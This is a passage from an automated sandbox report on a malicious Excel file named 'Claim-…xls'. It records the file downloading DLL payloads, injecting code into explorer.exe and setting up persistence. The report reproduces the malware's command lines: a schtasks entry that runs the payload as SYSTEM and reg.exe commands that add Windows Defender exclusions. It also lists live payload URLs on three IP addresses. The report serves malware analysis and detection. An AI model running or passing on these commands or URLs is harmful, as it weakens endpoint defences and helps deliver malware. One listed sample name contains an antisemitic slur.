    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000CAEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 86_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 87_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10029660 GetProcessHeap,RtlAllocateHeap,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 83_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_1007792E mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_1007785D mov eax, dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 85_2_10077464 push dword ptr fs:[00000030h]
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000C5A61 RtlAddVectoredExceptionHandler,
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 87_2_00085A61 RtlAddVectoredExceptionHandler,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
    Writes to foreign memory regionsShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: F0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 8A102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 8A102D
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 8A102D
    Allocates memory in foreign processesShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: F0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write
    Injects code into the Windows Explorer (explorer.exe)Show sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 984 base: F0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 984 base: 8A102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2912 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2912 base: 8A102D value: E9
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 548 base: B0000 value: 9C
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 548 base: 8A102D value: E9
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Claim-1763045001-09242021.xls, type: SAMPLE
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mmvyheu /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 16:36 /ET 16:48
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Zavnutyohicp' /d '0'
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gurxzqhuuwqa' /d '0'
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
    Source: explorer.exe, 00000049.00000002.1501622473.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000049.00000002.1501622473.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: explorer.exe, 00000049.00000002.1501622473.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 73_2_000C31C2 CreateNamedPipeA,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 55_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter11Scheduled Task/Job1Process Injection413Masquerading121Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsScripting2Logon Script (Windows)Logon Script (Windows)Modify Registry1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsNative API1Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion1NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
    Cloud AccountsExploitation for Client Execution32Network Logon ScriptNetwork Logon ScriptProcess Injection413LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting2Cached Domain CredentialsSystem Information Discovery16VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 489852 Sample: Claim-1763045001-09242021.xls Startdate: 24/09/2021 Architecture: WINDOWS Score: 100 67 Document exploit detected (drops PE files) 2->67 69 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->69 71 Sigma detected: Schedule system process 2->71 73 6 other signatures 2->73 9 EXCEL.EXE 191 39 2->9         started        14 taskeng.exe 1 2->14         started        process3 dnsIp4 61 111.90.148.104, 49166, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 9->61 63 190.14.37.173, 49165, 80 OffshoreRacksSAPA Panama 9->63 65 51.89.115.111, 49168, 80 OVHFR France 9->65 55 C:\Users\user\Fiosa1.der, PE32 9->55 dropped 57 C:\Users\user\...\44463.6863100694[2].dat, PE32 9->57 dropped 59 C:\Users\user\...\44463.6863100694[1].dat, PE32 9->59 dropped 91 Document exploit detected (UrlDownloadToFile) 9->91 16 regsvr32.exe 9->16         started        18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 14->22         started        24 regsvr32.exe 14->24         started        file5 signatures6 process7 process8 26 regsvr32.exe 16->26         started        29 regsvr32.exe 18->29         started        31 regsvr32.exe 20->31         started        33 regsvr32.exe 22->33         started        35 regsvr32.exe 24->35         started        signatures9 81 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 26->81 83 Injects code into the Windows Explorer (explorer.exe) 26->83 85 Writes to foreign memory regions 26->85 37 explorer.exe 8 1 26->37         started        40 explorer.exe 29->40         started        87 Allocates memory in foreign processes 33->87 89 Maps a DLL or memory area into another process 33->89 43 explorer.exe 8 1 33->43         started        process10 file11 75 Uses cmd line tools excessively to alter registry or file data 37->75 77 Drops PE files to the user root directory 37->77 79 Uses schtasks.exe or at.exe to add and modify task schedules 37->79 45 schtasks.exe 37->45         started        51 C:\Users\user\Fiosa2.der, PE32 40->51 dropped 53 C:\Users\user\Fiosa.der, PE32 43->53 dropped 47 reg.exe 1 43->47         started        49 reg.exe 1 43->49         started        signatures12 process13

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Claim-1763045001-09242021.xls0%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.%s.comPA0%URL Reputationsafe
    http://51.89.115.111/44463.6863100694.dat0%Avira URL Cloudsafe
    http://190.14.37.173/44463.6863100694.dat0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    http://111.90.148.104/44463.6863100694.dat0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://51.89.115.111/44463.6863100694.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://190.14.37.173/44463.6863100694.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://111.90.148.104/44463.6863100694.datfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.%s.comPAregsvr32.exe, 00000037.00000002.1177895087.0000000002380000.00000002.00020000.sdmp, explorer.exe, 00000049.00000002.1501665453.00000000020E0000.00000002.00020000.sdmp, regsvr32.exe, 0000004E.00000002.1182716509.0000000002080000.00000002.00020000.sdmp, taskeng.exe, 00000051.00000002.1501516391.00000000007D0000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    		low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000037.00000002.1177895087.0000000002380000.00000002.00020000.sdmp, explorer.exe, 00000049.00000002.1501665453.00000000020E0000.00000002.00020000.sdmp, regsvr32.exe, 0000004E.00000002.1182716509.0000000002080000.00000002.00020000.sdmp, taskeng.exe, 00000051.00000002.1501516391.00000000007D0000.00000002.00020000.sdmpfalse
      		high
      http://servername/isapibackend.dllregsvr32.exe, 00000036.00000002.1180236690.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000037.00000002.1177193034.0000000000A10000.00000002.00020000.sdmp, regsvr32.exe, 0000004C.00000002.1185707196.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 0000004E.00000002.1181817022.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000052.00000002.1248992914.0000000000980000.00000002.00020000.sdmpfalse
      • Avira URL Cloud: safe
      		low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      190.14.37.173
      		unknownPanama
      		52469OffshoreRacksSAPAfalse
      51.89.115.111
      		unknownFrance
      		16276OVHFRfalse
      111.90.148.104
      		unknownMalaysia
      		45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYfalse

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:489852
      Start date:24.09.2021
      Start time:16:27:21
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 18m 0s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:Claim-1763045001-09242021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:104
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@34/9@0/3
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 24% (good quality ratio 22.7%)
      • Quality average: 77.2%
      • Quality standard deviation: 27%
      HCA Information:
      • Successful, ratio: 87%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, mscorsvw.exe, svchost.exe
      • TCP Packets have been reduced to 100
      • Excluded IPs from analysis (whitelisted): 209.197.3.8, 173.222.108.226, 173.222.108.210
      • Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      16:34:17API Interceptor41x Sleep call for process: regsvr32.exe modified
      16:34:18API Interceptor907x Sleep call for process: explorer.exe modified
      16:34:20API Interceptor2x Sleep call for process: schtasks.exe modified
      16:34:21Task SchedulerRun new task: mmvyheu path: regsvr32.exe s>-s "C:\Users\user\Fiosa.der"
      16:34:21API Interceptor372x Sleep call for process: taskeng.exe modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      190.14.37.173Claim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 190.14.37.173/44463.6668827546.dat
      51.89.115.111Claim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 51.89.115.111/44463.6668827546.dat
      111.90.148.104Claim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 111.90.148.104/44463.6668827546.dat

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      OffshoreRacksSAPAClaim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 190.14.37.173
      Payment-687700136-09212021.xlsGet hashmaliciousBrowse
      • 190.14.37.232
      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      4cDyOofgzT.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      4cDyOofgzT.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      341288734918_06172021.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      341288734918_06172021.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
      • 190.14.37.135
      Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
      • 190.14.37.135
      SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYClaim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 111.90.148.104
      b82IlqpqKM.exeGet hashmaliciousBrowse
      • 111.90.146.200
      AP.7.htmlGet hashmaliciousBrowse
      • 111.90.141.112
      z6eCorPozO.exeGet hashmaliciousBrowse
      • 111.90.151.16
      AP Remittance for bill.coleman@tetratech.com .htmlGet hashmaliciousBrowse
      • 111.90.158.219
      aia8XaelyQ.exeGet hashmaliciousBrowse
      • 111.90.151.16
      AP Remittance for tschlegelmilch@fmne.com .htmlGet hashmaliciousBrowse
      • 111.90.158.219
      Evopayments.mx--77Fax.HTMLGet hashmaliciousBrowse
      • 111.90.139.60
      B68CWSIIIV.exeGet hashmaliciousBrowse
      • 111.90.149.119
      46SGHijloy.exeGet hashmaliciousBrowse
      • 101.99.94.158
      Secured Fax_healthesystems.com.htmGet hashmaliciousBrowse
      • 111.90.158.219
      y1FOl1vVPA.exeGet hashmaliciousBrowse
      • 101.99.77.132
      K4.TA9.HTMLGet hashmaliciousBrowse
      • 111.90.139.60
      MJ.TA9.HTMLGet hashmaliciousBrowse
      • 111.90.141.176
      PM.TA9.HTMLGet hashmaliciousBrowse
      • 111.90.139.60
      Ed0tQRwEq1.exeGet hashmaliciousBrowse
      • 101.99.91.119
      2OhLduHQ9P.exeGet hashmaliciousBrowse
      • 101.99.91.119
      AP Remittance for robert.moelke@globalfoundries.com .htmlGet hashmaliciousBrowse
      • 111.90.158.219
      pbqkCjxPOF.exeGet hashmaliciousBrowse
      • 111.90.146.149
      CX.TA9.HTMLGet hashmaliciousBrowse
      • 111.90.139.60
      OVHFRClaim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 51.89.115.111
      proforma invoice_pdf_____________________________.exeGet hashmaliciousBrowse
      • 51.195.17.68
      NoO16S4omQ.exeGet hashmaliciousBrowse
      • 87.98.185.184
      9jV2cBN6cQ.exeGet hashmaliciousBrowse
      • 66.70.204.222
      HSBC94302,pdf.exeGet hashmaliciousBrowse
      • 51.254.53.102
      ZamCfP5Dev.exeGet hashmaliciousBrowse
      • 178.32.120.127
      zuyrzhibfm.exeGet hashmaliciousBrowse
      • 188.165.222.221
      INV, BL, PL.exeGet hashmaliciousBrowse
      • 94.23.48.114
      b3astmode.x86Get hashmaliciousBrowse
      • 37.59.48.250
      b3astmode.armGet hashmaliciousBrowse
      • 51.83.43.58
      New Order.docGet hashmaliciousBrowse
      • 164.132.171.176
      2xgbTybbdXGet hashmaliciousBrowse
      • 51.222.234.64
      qri9CgHh4MGet hashmaliciousBrowse
      • 51.222.234.64
      eerjoaAQC2Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.mpslGet hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.mipsGet hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.arm7Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.x86Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.arm5Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.arm4Get hashmaliciousBrowse
      • 51.222.234.64

      JA3 Fingerprints

      No context

      Dropped Files

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\Fiosa.derClaim-680517779-09242021.xlsGet hashmaliciousBrowse
        C:\Users\user\Fiosa2.derClaim-680517779-09242021.xlsGet hashmaliciousBrowse

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[1].dat
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):991232
          Entropy (8bit):6.443782963420258
          Encrypted:false
          SSDEEP:24576:RGWGYvyisJZdZ2wZ5fGWGYvyisJZdZ2wZ5:RG9YO7/fG9YO7/
          MD5:7EA14FAB1C9289C31A418F29A93FD66B
          SHA1:3CE15658DB90B8F5792126444E2FD6375DE1BF55
          SHA-256:9C82F24B311F775E83DD1007F22B5D281F1E9A767148147E194EF046E6467D05
          SHA-512:61BE1E4A08E38B92EF64216817E5DBB71FCF1B06F90C54B6B78BCE84B5337B67A44C664F1E8880841CF6ECDD497ECF6F1892D922D9938F909196123D533E430D
          Malicious:true
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.6863100694[2].dat
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):97972
          Entropy (8bit):6.4820203315285045
          Encrypted:false
          SSDEEP:1536:Ch2iZdxbqIVTmfhPsWlX3JfllZyvhK9t56IjIHtUgRf//YLzD+ari29:Ch2SPbqzPtnbvDaf//YvD+l29
          MD5:344C7B31F7C31D4FA66933403EDFCC44
          SHA1:D3A146B93F63FDDE56FA77F40813CBB5E4B70B0C
          SHA-256:D6ECA3E2A2C23F7768851F6111A638B853E05B83C01593EE95AD135FBE84F741
          SHA-512:9DF062C0DEDE3B00627F319A3FA374E80E1136149CAC113DC5308C00A84F4DB8B8C875EC3AF68097735DF06177696521B4FA7829C04D5413AD6D58A9F5E17D07
          Malicious:true
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.....`...`...`......`..X....`.7Z..2.`.7Z....`..>...`...a...`.7Z..G.`.7Z....`.7Z....`.7Z....`.Rich..`.........................PE..L...'..E...........!.................1..............................................{................................?.......9..<............................`......p................................/..@...............,............................text...5........................... ..`.rdata..............................@..@.data...<....P.......P..............@....reloc...$...`...0...`..............@..B................................................................................................................................................................................................................................................................................................................................................
          C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):162688
          Entropy (8bit):4.254394829588552
          Encrypted:false
          SSDEEP:1536:C6YL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CFJNSc83tKBAvQVCgOtmXmLpLm4l
          MD5:2FECEC53CC3C0FB6F6FFF7560D3F4857
          SHA1:47386F6165CA2FAE55C52D3CA378D25F32E915C2
          SHA-256:C5D7CCA00964B94678EE361504362103AD7B8098816ABA2D08C92CD5F9FA22AA
          SHA-512:0B652FD4D3D484B930517B2CC7B1EF35A71871A777DD04377D3CA8EFB4311EEA1BDBCD27528D4B1F46D0476086AFCA705226A9C516782AA7B1485962FB44488F
          Malicious:false
          Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
          C:\Users\user\Fiosa.der
          Process:C:\Windows\SysWOW64\explorer.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):495616
          Entropy (8bit):1.3741485480829125
          Encrypted:false
          SSDEEP:1536:s2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:WC6MtAAFNJ5XC5SYCi02r+J
          MD5:15C440CEBA523F1FA008FAA03D09AC99
          SHA1:A8EBA7725DB51F790E285D1223FAAED050242063
